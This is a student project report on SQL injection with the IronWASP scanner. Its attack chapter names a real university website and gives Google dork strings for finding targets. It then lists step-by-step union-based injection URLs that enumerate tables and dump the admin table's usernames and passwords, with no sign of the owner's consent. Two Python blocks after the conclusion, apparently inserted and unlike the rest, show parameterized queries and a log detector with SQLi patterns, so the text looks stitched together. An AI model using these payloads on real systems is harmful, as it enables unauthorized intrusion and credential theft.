
Project Report

IRONWASP

Class Teacher
Sir Waqar Ahmed
PAF KIET

Submitted by
Muhammad Burhan Shafaat

54596

DEPARTMENT OF COMPUTER SCIENCE
PAF Karachi Institute of Economics and Technology
28-D, Block 6, P.E.C.H.S, Karachi – 75400
Dec 2014

PREFACE

It gives me a sense of satisfaction and pleasure at the same time while writing the preface for the IRONWASP project report. It took several weeks of immense hard work and tiredness to complete this project.

As the use of computers in industry, commerce, education and many other fields of life has become very common, the question of information and system security arises. Avoiding attacks on information and network wouldn't be that easy. It requires a lot of effort to avoid these attacks.

This report discusses SQL injection vulnerability identification and attacking. This report is carefully designed to offer information appropriate for SQL Injection vulnerability. A thorough study has been carried out of the topic. All the material has been collected in relevance with the SQL injection vulnerability. All the topics are comprehensively dealt with to give the reader a firm grounding in the issue.

Therefore, I have presented the project report in a way which is accessible to everyone. Explanations of concepts and principles are concise and written in clear and simple language with supportive illustrations where required. Different diagrams are provided to make this report even more logical and understandable for the reader. My intention has been to produce a report which covers completely all the aspects of this project.

Muhammad Burhan

ACKNOWLEDGMENT

First of all, I thank Almighty Allah who praised me with the ability to think, work and deliver what I was assigned to do. Without His mercy it was not possible at all.

Secondly, I am grateful to my teacher Mr. Waqar Ahmed who was always there to guide me and sort out my problems. I also acknowledge all my teachers, departmental staff, and university staff, who throughout my studies helped me and guided me.

I then wish to show appreciation to all those individuals who have helped me in any way in the making of this project.

Muhammad Burhan

TABLE OF CONTENTS

PREFACE
ACKNOWLEDGEMENTS
TABLE OF CONTENTS

Chapter 1 INTRODUCTION
1.1 Objective
1.2 Theoretical Background
1.3 Project Scope

Chapter 2 IRONWASP
2.1 Introduction to Iron WASP
2.2 Reason for Iron WASP Selection

Chapter 3 LAUNCHING ATTACK
3.1 How to Find Target?
3.2 Target
3.3 Start Attack

Chapter 4 CONCLUSION
4.1 Conclusion

Appendix A REFERENCES
A.1 WEB References

Chapter 1 INTRODUCTION

1 Introduction

This chapter gives a brief introduction to the project. It provides the objective, theoretical background and project scope.

1.1 Objective

The aim of my project is to attack a website using IRONWASP for SQL Injection vulnerability detection and also to attack the affected website using SQL Injection.

1.2 Theoretical Background

What is SQL injection?

SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

What is software vulnerability?

Software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. An example of a software flaw is a buffer overflow.

What is IronWASP?

IronWASP (Iron Web application Advanced Security testing Platform) is one of the world's best web vulnerability scanners.

1.3 Project Scope

1. To understand and demonstrate the working of “Iron Wasp”.
2. Identify vulnerability using “Iron Wasp”.
3. Perform attack using SQL Injection.

CHAPTER 2 IRONWASP

2 Iron WASP

This chapter gives you an introduction to Iron WASP. It provides the introduction and the reasons for the selection of Iron WASP.

2.1 Introduction to Iron WASP

IronWASP (Iron Web application Advanced Security testing Platform) is one of the world's best web vulnerability scanners. It is an open source system for web application vulnerability testing. It is developed by Lavakumar Kuppan. It is designed to make automated scanning and testing an easy process. It is designed to be customizable to the extent where users can create their own custom security scanners using it. Though an advanced user with Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the tool's features are simple enough to be used by absolute beginners.

Figure 1: Iron WASP Interface

2.2 Reasons for Iron WASP Selection

1. It's Free and Open source.
2. GUI based and very easy to use, no security expertise required.
3. Powerful and effective scanning engine.
4. Supports recording Login sequence.
5. Reporting in both HTML and RTF formats.
6. Checks for over 25 different kinds of web vulnerabilities.
7. False Positives detection support.
8. False Negatives detection support.
9. Industry leading built-in scripting engine that supports Python and Ruby.
10. Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.
11. Comes bundled with a growing number of Modules built by researchers in the security community.

CHAPTER 3 LAUNCHING ATTACK

3 Launching Attack

This chapter gives you an idea of how to launch the attack. It provides details regarding the target and launching the attack.

3.1 How to find the target?

Searching on www.google.com using the following key words will help you to find a target:

inurl: php?category=
inurl: php?id=

or with similar keywords.

3.2 Target

My target is The Laureate Business School (website: http://www.thelaureate.edu.pk) as shown in figure 2, which is affiliated with RPHAH International University.

The university offers several undergraduate programs (BS, BSc, BBA, etc) as well as graduate programs (MBA, etc).

Figure 2: Target website.

Figure 3 shows that SQL injection was detected on the university website (i.e. http://www.thelaureate.edu.pk).

Figure 3: SQL Injection Vulnerability Detected

3.3 Start Attack

Step 1: Use order by clause to find the number of columns in the table. Use the order by clause and increase the column number 1, 2, 3 … n till you get an error. For Example:

http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3
:
:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7

Figure 4 shows that on the 7th column we find the following error, which means that we have only 6 columns in the table which is displaying data.

Figure 4: Shows error on 7th column.

Step 2: Finding columns that are displaying on page. To find the columns that are displayed on the web page we have to use a “union query”, for example:

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1.2.3.4.5.6+order+by+1

Figure 5: Displayed Columns.

Step 3: Using group_concat function. The group_concat function is used to display all table names of the given schema. For example:

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1.2.3.group_concat(table_name)+.5.6+from+information_schema.tables+where+table_schema=database()+order+by+1

The above link displayed a few tables belonging to the current schema: “admin, email_group, email_management, e-news, image_gallery, images_listing, navigation, navigation_bk, news_and_events, notice_board and pages”.

Figure 6: Table names.

Step 4: Find hex of the target table. The admin table is looking more interesting. Therefore I find the hex code of “admin” which is 61646d696e. We have to enter the hex code for the table name in the query to execute this successfully.

Step 5: Finding column names of the table. Group_concat will be used to display the column names. For example:

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1.2.3.group_concat(column_name)+.5.6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1

Figure 7: Shows the column names of admin table.

Step 6: Retrieving data. In the last step I successfully retrieved the column names (i.e. username and password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results of admin table.

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1.2.+username+.+password+.5.6+from+admin+order+by+1

Figure 8: Shows the data of admin table.

Step 7: Beyond this is not ethical. I feel that moving ahead like delete, modify and inserting data into tables is not ethical.

Chapter 4 CONCLUSION

4 Conclusion

As you have seen, I demonstrated the SQL injection technique. So we can insert, update and delete any data as well as database objects (like tables, views etc) using SQL injection. Now-a-days there are several software products available which show the availability of vulnerability in web and desktop applications. Therefore the desktop and web applications should be built on standards to avoid attacks.
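The conclusion's point about building applications "on standards" comes down, for this flaw, to validating the id parameter and binding it instead of concatenating it. The sketch below is an added example, not code from the report or from the site it describes; it uses Python with an in-memory SQLite database, and the table contents and function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory data: the table name "admin" follows the report,
    # every value stored here is made up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (10, 'Admissions', 'Admissions are open.');
        INSERT INTO admin VALUES ('constructed-user', 'constructed-secret');
    """)
    return db

def get_page_vulnerable(db, page_id):
    # The request value is concatenated into the statement, so the database
    # parses whatever follows the number as SQL.
    sql = "SELECT id, title, body FROM pages WHERE id = " + page_id
    return db.execute(sql).fetchall()

def get_page_bound_only(db, page_id):
    # Binding alone already neutralises the input: it is compared as one value.
    sql = "SELECT id, title, body FROM pages WHERE id = ?"
    return db.execute(sql, (page_id,)).fetchall()

def get_page_safe(db, page_id):
    # Validate first: this parameter is only ever a small positive integer.
    if not re.fullmatch(r"[0-9]{1,9}", page_id):
        raise ValueError("id must be a positive integer")
    # Then bind: the placeholder keeps the value out of the SQL grammar.
    sql = "SELECT id, title, body FROM pages WHERE id = ?"
    return db.execute(sql, (int(page_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "10 union select 1, username, password from admin"  # constructed input
    print(get_page_vulnerable(db, probe))  # admin row appears beside the page row
    print(get_page_bound_only(db, probe))  # no rows: the text never matches an id
    print(get_page_safe(db, "10"))         # the legitimate page
```

With the concatenated query, a column-count probe such as "10 order by 7" also surfaces a database error, which is the signal Step 1 relies on; the validated function rejects it before any SQL runs.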
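The steps in Chapter 3 leave a recognisable trail in a web server's access log: numeric order by probes, then union select, then information_schema and group_concat in the query string. The following is an added example, not part of the original report; the log lines are constructed (documentation IP ranges) and the rule names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines; client addresses are RFC 5737 documentation IPs.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Dec/2014:10:00:01 +0000] "GET /contents.php?id=10 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Dec/2014:10:00:05 +0000] "GET /contents.php?id=10+order+by+1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Dec/2014:10:00:09 +0000] "GET /contents.php?id=10+order+by+7 HTTP/1.1" 200 612
198.51.100.7 - - [01/Dec/2014:10:00:20 +0000] "GET /contents.php?id=10%20UNION%20SELECT%201 HTTP/1.1" 200 5301
198.51.100.7 - - [01/Dec/2014:10:00:31 +0000] "GET /contents.php?id=1+from+information_schema.tables HTTP/1.1" 200 5410
203.0.113.5 - - [01/Dec/2014:10:01:00 +0000] "GET /news.php?title=order+by+phone HTTP/1.1" 200 2048
"""

# Hypothetical rule names; each pattern runs on the decoded, lower-cased query.
RULES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "group-concat": re.compile(r"\bgroup_concat\s*\("),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(log_text):
    """Return {client: sorted rule names matched in that client's requests}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, _status = m.groups()
        # Decode %xx and '+' so encoded and plain forms match the same rule.
        query = unquote_plus(urlsplit(target).query).lower()
        query = re.sub(r"/\*.*?\*/", " ", query)  # inline comments used as spaces
        for name, rx in RULES.items():
            if rx.search(query):
                hits[client].add(name)
    return {client: sorted(names) for client, names in hits.items()}

def suspicious_clients(log_text, min_rules=2):
    # One match can be noise; several distinct stages from one client is a probe.
    return sorted(c for c, names in scan(log_text).items() if len(names) >= min_rules)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
    print(suspicious_clients(SAMPLE_LOG))
```

The search for "order by phone" in the last sample line is left unflagged because the rule requires a numeric column position, which keeps ordinary site searches from raising alerts.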

APPENDIX A WEB REFERENCES

Web References

[1] http://www.thelaureate.edu.pk (Target Website)
[2] http://string-functions.com/string-hex.aspx (Convert String to Hex)